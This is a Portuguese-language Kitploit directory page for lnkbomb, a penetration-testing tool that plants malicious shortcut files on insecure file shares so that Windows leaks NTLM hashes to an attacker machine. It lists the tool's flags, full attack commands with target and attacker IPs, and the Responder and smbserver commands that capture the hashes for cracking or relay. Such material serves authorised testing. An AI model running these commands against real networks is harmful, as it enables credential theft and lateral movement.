Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
lnkbomb — Gerador de atalhos maliciosos para coletar hashes NTLM de compartilhamentos de arquivos inseguros. | Kitploit
Ferramentas/GitHubGitHub/dievus/lnkbomb
Ataques de SenhaExploraçãoMovimento LateralColeta de InformaçõesTestes de PenetraçãoRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Gerador de atalhos maliciosos para coletar hashes NTLM de compartilhamentos de arquivos inseguros.

Ver Repositório
363627há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Lnkbomb

ko-fi

O Lnkbomb é usado para carregar arquivos de atalho maliciosos em compartilhamentos de arquivos inseguros. A vulnerabilidade existe porque o Windows procura um arquivo de ícone para associar ao arquivo de atalho. Esse arquivo de ícone pode ser direcionado para a máquina de um testador de penetração que esteja executando o Responder ou smbserver para coletar hashes NTLMv1 ou NTLMv2 (dependendo da configuração da máquina vítima). O testador pode então tentar quebrar esses hashes coletados offline com uma ferramenta como Hashcat, ou retransmiti-los para uma ferramenta como ntlmrelayx para exploração adicional.

O arquivo de payload é carregado diretamente no arquivo inseguro especificado pelo testador na linha de comando. O testador também inclui seu endereço IP, que é escrito no payload.

A versão 2.0 é uma reconstrução total da ferramenta e utiliza a biblioteca pysmb, permitindo a entrega de payloads não autenticados e autenticados.

Uso em Python

Instalando o Lnkbomb

Observe que o projeto funciona de forma consistente no Windows. Pode apresentar problemas no Linux.

git clone https://github.com/dievus/lnkbomb.git

Mude para o diretório lnkbomb e execute:

python3 lnkbomb.py -h

Isso exibirá o menu de ajuda, que contém as seguintes flags:

-h, --help - Lists the help options

-t, --target - Specifies the target IP address

-a, --attacker - Specifies the tester's attack machine IP address

-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)

-w, --windows - New command - required for setting appropriate ports for Windows shares

-l, --linux - New command - required for setting appropriate ports for Linux shares

-n, --netbios - New command - netbios name for targeted Windows machines must be included

Exemplos de comandos completos incluem:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Você precisará utilizar uma ferramenta como Responder ou smbserver para capturar o hash NTLM.
responder -I eth0 -dwFP -v

ou

smbserver.py . . -smb2support

Notas

Lembre-se de que esta ferramenta é destinada apenas a fins de hacking ético e testes de penetração. Não aprovo nenhum comportamento que envolva testar alvos para os quais você não tenha permissão atual para testar.

Esta ferramenta pode ou não funcionar dependendo da aplicação de patches e versão do alvo. A experiência do usuário pode variar.

Sei que são atalhos .url e não extensões .lnk. Faço isso para te provocar.

Baixar ferramenta